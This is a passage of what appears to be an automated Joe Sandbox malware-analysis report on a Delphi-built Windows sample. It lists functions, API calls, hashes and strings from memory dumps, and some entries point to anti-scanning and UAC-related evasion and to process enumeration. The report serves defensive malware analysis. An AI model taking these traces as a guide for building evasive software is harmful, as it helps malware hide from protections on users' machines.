Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 251e92fc10e7af7397377603fe9152e2251dce8f56d160a47fc6d7711774cdb8
Instruction ID: 73f0661aa9478826500155d02b042179716467db380d498f65c9d988d2586598
Opcode Fuzzy Hash: 251e92fc10e7af7397377603fe9152e2251dce8f56d160a47fc6d7711774cdb8
Instruction Fuzzy Hash: ADF09DB2600118BF8B80DE9DDC80EDBB7EDEB8C2A4B058165FA0CD7200D630ED109BB4

Uniqueness

Uniqueness Score: -1.00%

Function 029EEF38 Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(00000000,?,00000000,029EEF85,?,?,?,00000000), ref: 029EEF65

Part of subcall function 029D4F68: SysFreeString.OLEAUT32(02A2C89C), ref: 029D4F76

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: FreeFromProgString
String ID:
API String ID: 4225568880-0
Opcode ID: 29d721b5fff568bb1954a0dd386dd61f6bab7b88f3698d103b10a40c7070a069
Instruction ID: e359f368536c4fb17daee35fe3127e1536b5e2566f6cb149fd8ffc16962a7390
Opcode Fuzzy Hash: 29d721b5fff568bb1954a0dd386dd61f6bab7b88f3698d103b10a40c7070a069
Instruction Fuzzy Hash: 20E02B303046087FE702EBA0CC01D5D77DDDFC9710FE288B1E441D3540DA705E009961

Uniqueness

Uniqueness Score: -1.00%

Function 029D5B78 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(029D0000,?,00000105), ref: 029D5B96

Part of subcall function 029D5DDC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,029D0000,02A3A794), ref: 029D5DF8
Part of subcall function 029D5DDC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,029D0000,02A3A794), ref: 029D5E16
Part of subcall function 029D5DDC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,029D0000,02A3A794), ref: 029D5E34
Part of subcall function 029D5DDC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 029D5E52
Part of subcall function 029D5DDC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,029D5EE1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 029D5E9B
Part of subcall function 029D5DDC: RegQueryValueExA.ADVAPI32(?,029D6048,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,029D5EE1,?,80000001), ref: 029D5EB9
Part of subcall function 029D5DDC: RegCloseKey.ADVAPI32(?,029D5EE8,00000000,?,?,00000000,029D5EE1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 029D5EDB

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: Open$FileModuleNameQueryValue$Close
String ID:
API String ID: 2796650324-0
Opcode ID: 3b17160cd34436c47c42d63791b6be8e89ec8c34d9187eb90482b984e983ccd8
Instruction ID: 33ad9bb25dac34d172f19041162fc1d517b2f10648f77b51a69fb80dda1a04fb
Opcode Fuzzy Hash: 3b17160cd34436c47c42d63791b6be8e89ec8c34d9187eb90482b984e983ccd8
Instruction Fuzzy Hash: D0E06DB1A013148FCF10DE58C9C0B8633D8AF08790F4185A5ED98CF346D3B1DA109BE0

Uniqueness

Uniqueness Score: -1.00%

Function 029D8D64 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 029D8D78

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: d4a83ef73bc856c33152c5a4506e379bca90fd87d8296263b7b9ff213f4cdc5f
Instruction ID: 7d9da1091af86896b311a4aefcae1897c9f67087f48b36da3be7d372dde7e08b
Opcode Fuzzy Hash: d4a83ef73bc856c33152c5a4506e379bca90fd87d8296263b7b9ff213f4cdc5f
Instruction Fuzzy Hash: C2D05B723081107AD220A55B6C84EAB5BDCDFC5770F104639B658C3181D7208C02D771

Uniqueness

Uniqueness Score: -1.00%

Function 029D8E04 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,02A3062B,ScanString,02A6A350,02A37AE0,OpenSession,02A6A350,02A37AE0,OpenSession,02A6A350,02A37AE0,ScanBuffer,02A6A350,02A37AE0,ScanString), ref: 029D8E0F

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 30fa6541ff96c3e5d0710b90c2cec70c33bdd6f8f4e7b3c7ff7eccc32c301030
Instruction ID: fee2df497545d2577d8683eb9b9888037b5bc30a63d5740b0fcef639319889ca
Opcode Fuzzy Hash: 30fa6541ff96c3e5d0710b90c2cec70c33bdd6f8f4e7b3c7ff7eccc32c301030
Instruction Fuzzy Hash: 83C08CA07012000A1F50B1FC1EC066A028C5985239320AE21E429C31E3D326A0633C30

Uniqueness

Uniqueness Score: -1.00%

Function 029D4F80 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 029D4F93

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: f9cf8d993bf6b984c3a206198d86c8bdb50b9fa8060aaea77c6d17370c297a51
Instruction ID: ea9ac250b33e65e3944edb50bb414579b27382e6a1cc1553fab8786bf01f5191
Opcode Fuzzy Hash: f9cf8d993bf6b984c3a206198d86c8bdb50b9fa8060aaea77c6d17370c297a51
Instruction Fuzzy Hash: E0C012B26512200BFF319A5D9CC0B5562CC9B45255F5844B1E504DB250E37098005751

Uniqueness

Uniqueness Score: -1.00%

Function 029D4FA4 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(02A2C89C), ref: 029D4F76
SysReAllocStringLen.OLEAUT32(02A38B50,02A2C89C,00000016), ref: 029D4FBE

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 93a5ce073feb878bcb9b2f43cb14a0c0014240474e4f6b899e299ef47583e6fd
Instruction ID: f94c53811bfa46bd69720b38a6946471313918d1848c431b8071fc1302608477
Opcode Fuzzy Hash: 93a5ce073feb878bcb9b2f43cb14a0c0014240474e4f6b899e299ef47583e6fd
Instruction Fuzzy Hash: ADD0807450424159DF28575D4504536716D9ED134578EEE7D5C424F1E1D735C400FF30

Uniqueness

Uniqueness Score: -1.00%

Function 029D8DE0 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,02A2D4C6,ScanString,02A6A350,02A37AE0,OpenSession,02A6A350,02A37AE0,ScanString,02A6A350,02A37AE0,UacScan,02A6A350,02A37AE0,UacInitialize), ref: 029D8DEB

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: a3cc43febdbb8b82c70b3e6b5e69f1f9d3b39444bdcc1537f45fcfbcea189d03
Instruction ID: 0122c265ec2d0a6fe8a2f2670a1f638c7dbd903d2900723f82970347c0fe8e00
Opcode Fuzzy Hash: a3cc43febdbb8b82c70b3e6b5e69f1f9d3b39444bdcc1537f45fcfbcea189d03
Instruction Fuzzy Hash: 69C08CA0211200079B1465FC1EC407A068C9D992393249E21A438C31E3D33690633820

Uniqueness

Uniqueness Score: -1.00%

Function 02A38710 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

timeSetEvent.WINMM(00002710,00000000,02A38704,00000000,00000001), ref: 02A38720

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: Eventtime
String ID:
API String ID: 2982266575-0
Opcode ID: 28ed8bd73b92293b91ddd49e82c63a7d9361241ac04184f4ebb90ac19da30f0e
Instruction ID: 35f5549f9785c265009cc27fa79612d03c3bc4ba3261c44a56bb308c5a573d80
Opcode Fuzzy Hash: 28ed8bd73b92293b91ddd49e82c63a7d9361241ac04184f4ebb90ac19da30f0e
Instruction Fuzzy Hash: FFC092F0785300BEF61056A45CD2F23518EE344B65F508821FA01EE2C1D5E68A1096A2

Uniqueness

Uniqueness Score: -1.00%

Function 029D4F40 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON

Download Yara Rule

APIs

SysAllocStringLen.OLEAUT32(00000000,?), ref: 029D4F47

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: AllocString
String ID:
API String ID: 2525500382-0
Opcode ID: 61128e9512ae7fb8001b69d029d8ec20854896d5f37afe652109874d530df956
Instruction ID: 86dc3256b95070d23bb321b5878a1d4cc0207636a1d3bc39018cbd8d3fde71eb
Opcode Fuzzy Hash: 61128e9512ae7fb8001b69d029d8ec20854896d5f37afe652109874d530df956
Instruction Fuzzy Hash: 5FB0122820C28110FB1021E50D00732019C0F50148F84E431DE1CD00D6DB15C015BC35

Uniqueness

Uniqueness Score: -1.00%

Function 029D4F58 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 029D4F5F

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: bd39776b076f6af8f38c0dfbbec83bbd8ce8162656848b3a59b1dbb085e3510c
Instruction ID: 2796521b17676fb47112ef457c777267418502afcbf6b65b699010e5abb66475
Opcode Fuzzy Hash: bd39776b076f6af8f38c0dfbbec83bbd8ce8162656848b3a59b1dbb085e3510c
Instruction Fuzzy Hash: 19A022AC00030308CF0B332E0000B3A203B3FC02083CCC0B802002E020CF3B8000FC20

Uniqueness

Uniqueness Score: -1.00%

Function 029EE97C Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 029EE99A

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 292df9f93813e654f745adace593bef72001df04676ef05833f3e71ae8593d34
Instruction ID: 8c9408ec0f0f96c00558b139009b6627656db181d09254e257164e20c0a82903
Opcode Fuzzy Hash: 292df9f93813e654f745adace593bef72001df04676ef05833f3e71ae8593d34
Instruction Fuzzy Hash: A2117C35A403058FCB51DF18C880B52F7E5EFA8360F14C53AE9A98B386D774E905CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 029D1668 Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,029D1A9F,?,029D209C), ref: 029D167E

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1fa8efd749deadda9ec3bee9bc52248e6b09d1d204967218c38efcb9457264c4
Instruction ID: d4a2be8b10f165ab26f81e4030ae3b85193b70949249694f99d76ccdcc79484b
Opcode Fuzzy Hash: 1fa8efd749deadda9ec3bee9bc52248e6b09d1d204967218c38efcb9457264c4
Instruction Fuzzy Hash: E4F049F1B603008FEB06DF799D58312BAD2E789349F14C579D609DB788EB7188028B10

Uniqueness

Uniqueness Score: -1.00%

Function 029D171E Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,029D209C), ref: 029D1740

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: ddcc2504e4bc62ec4488e6634b332b5baa9410f9dafa0fee819982725f9876c6
Instruction ID: 6f6d05d8e358051f4ec17273c7623116a4d62b375aff0f54eba6caf5056a493d
Opcode Fuzzy Hash: ddcc2504e4bc62ec4488e6634b332b5baa9410f9dafa0fee819982725f9876c6
Instruction Fuzzy Hash: CAF0BEB6B40756ABE7108F9A9C84B83BB94FB40361F058539FA0C97348DB71E811CBD4

Uniqueness

Uniqueness Score: -1.00%

Function 029D1782 Relevance: 1.3, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,029D2080), ref: 029D17A0

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 922b3c135c5edef717642931258d06cb666244f42d712835937c44cac7dbc329
Instruction ID: a08d8b747ad6bbdf9a63405195bd3d3aa2c9b697f00a2842edfc980e87f5f736
Opcode Fuzzy Hash: 922b3c135c5edef717642931258d06cb666244f42d712835937c44cac7dbc329
Instruction Fuzzy Hash: E6E08C76300301AFE7101EBA4D84B53ABD8EB986A1F288875F649DB291D770E8409BA0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02A28820 Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02A28AA7,?,?,02A28B39,00000000,02A28C15), ref: 02A28834
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02A2884C
GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02A2885E
GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02A28870
GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02A28882
GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02A28894
GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02A288A6
GetProcAddress.KERNEL32(00000000,Process32First), ref: 02A288B8
GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02A288CA
GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02A288DC
GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02A288EE
GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02A28900
GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02A28912
GetProcAddress.KERNEL32(00000000,Module32First), ref: 02A28924
GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02A28936
GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02A28948
GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02A2895A

Strings

Process32Next, xrefs: 02A288C2
Module32First, xrefs: 02A2891C
Heap32First, xrefs: 02A2887A
Module32Next, xrefs: 02A2892E
kernel32.dll, xrefs: 02A2882F
Heap32Next, xrefs: 02A2888C
CreateToolhelp32Snapshot, xrefs: 02A28844
Toolhelp32ReadProcessMemory, xrefs: 02A2889E
Heap32ListNext, xrefs: 02A28868
Module32FirstW, xrefs: 02A28940
Process32NextW, xrefs: 02A288E6
Thread32First, xrefs: 02A288F8
Heap32ListFirst, xrefs: 02A28856
Process32FirstW, xrefs: 02A288D4
Thread32Next, xrefs: 02A2890A
Module32NextW, xrefs: 02A28952
Process32First, xrefs: 02A288B0

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
API String ID: 667068680-597814768
Opcode ID: 7dc295d28f4de16c98614f9ff000ea6736b2993ff7a1e4e9d521134d13db048f
Instruction ID: 75c2f5947d47903e86142f3937240d6e6f564c3af64770947ed39a5fe7ab8c60
Opcode Fuzzy Hash: 7dc295d28f4de16c98614f9ff000ea6736b2993ff7a1e4e9d521134d13db048f
Instruction Fuzzy Hash: 5A31A5B0A84360AFFF00EBB8A8D9A6537A9EB557007004969F415EF205DF7CD459DF22

Uniqueness

Uniqueness Score: -1.00%

Function 029F4F7C Relevance: 48.5, APIs: 32, Instructions: 500windowCOMMON

Download Yara Rule

APIs

GetObjectA.GDI32(00000000,00000054,?), ref: 029F4FFC
GetDC.USER32(00000000), ref: 029F500D
CreateCompatibleDC.GDI32(00000000), ref: 029F501E
CreateBitmap.GDI32(00000000,?,00000001,00000001,00000000), ref: 029F506A
CreateCompatibleBitmap.GDI32(00000028,00000000,?), ref: 029F508E
SelectObject.GDI32(?,?), ref: 029F52EB
SelectPalette.GDI32(?,00000000,00000000), ref: 029F532B
RealizePalette.GDI32(?), ref: 029F5337
SetTextColor.GDI32(?,00000000), ref: 029F53A0
SetBkColor.GDI32(?,00000000), ref: 029F53BA
SetDIBColorTable.GDI32(?,00000000,00000002,?,?,00000000,?,00000000,00000000,029F5548,?,00000000,029F556A,?,00000000,029F557B), ref: 029F5402
FillRect.USER32(?,?,00000000), ref: 029F5388

Part of subcall function 029F1CEC: GetSysColor.USER32(?), ref: 029F1CF6

PatBlt.GDI32(?,00000000,00000000,?,?,00FF0062), ref: 029F5424
CreateCompatibleDC.GDI32(00000028), ref: 029F5437
SelectObject.GDI32(?,00000000), ref: 029F545A
SelectPalette.GDI32(?,00000000,00000000), ref: 029F5476
RealizePalette.GDI32(?), ref: 029F5481
SetTextColor.GDI32(?,00000000), ref: 029F549F
SetBkColor.GDI32(?,00000000), ref: 029F54B9
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 029F54E1
SelectPalette.GDI32(?,00000000,000000FF), ref: 029F54F3
SelectObject.GDI32(?,00000000), ref: 029F54FD
DeleteDC.GDI32(?), ref: 029F5518

Part of subcall function 029F2AA8: CreateBrushIndirect.GDI32(?), ref: 029F2B53

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID: ColorSelect$CreatePalette$Object$Compatible$BitmapRealizeText$BrushDeleteFillIndirectRectTable
String ID:
API String ID: 1299887459-0
Opcode ID: 3f3c347f01954709fb20429106574ffc4fb3a539df5aea5aa3819d727d4cc4f3
Instruction ID: ea62522f0d343a70bbcd5f1fdabd30d4663f00a7ac2b9cc48085dc368a60ff85
Opcode Fuzzy Hash: 3f3c347f01954709fb20429106574ffc4fb3a539df5aea5aa3819d727d4cc4f3
Instruction Fuzzy Hash: C212E671A00209AFDB90EFA8D884F9EB7B9EF48310F558555FA18EB291C775E940CF60

Uniqueness

Uniqueness Score: -1.00%

Function 02A2319C Relevance: 26.7, APIs: 13, Strings: 2, Instructions: 405COMMON

Download Yara Rule

Strings

vcltest3.dll, xrefs: 02A2359D
RegisterAutomation, xrefs: 02A235BE

Memory Dump Source

Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: RegisterAutomation$vcltest3.dll
API String ID: 0-2963190186
Opcode ID: e544acce6900a9ac91b3b3dcba7b8f50f8a5d8a626c1e0eca3ce0f64a0ae1097
Instruction ID: 0b5c0662d7850726d713e434cdf631f89f97b4c47cb031613e045d909e0e89d2
Opcode Fuzzy Hash: e544acce6900a9ac91b3b3dcba7b8f50f8a5d8a626c1e0eca3ce0f64a0ae1097
Instruction Fuzzy Hash: DDE13835A04224EFDF04DFACC684A9DB7B6AB4A314F1581E5E9099B251CF38EE48DF50

Uniqueness

Uniqueness Score: -1.00%

Function 029D5C18 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,029D7A18,029D0000,02A3A794), ref: 029D5C35
GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 029D5C4C
lstrcpynA.KERNEL32(?,?,?), ref: 029D5C7C
lstrcpynA.KERNEL32(?,?,?,kernel32.dll,029D7A18,029D0000,02A3A794), ref: 029D5CE0
lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,029D7A18,029D0000,02A3A794), ref: 029D5D16
FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,029D7A18,029D0000,02A3A794), ref: 029D5D29
FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,029D7A18,029D0000,02A3A794), ref: 029D5D3B
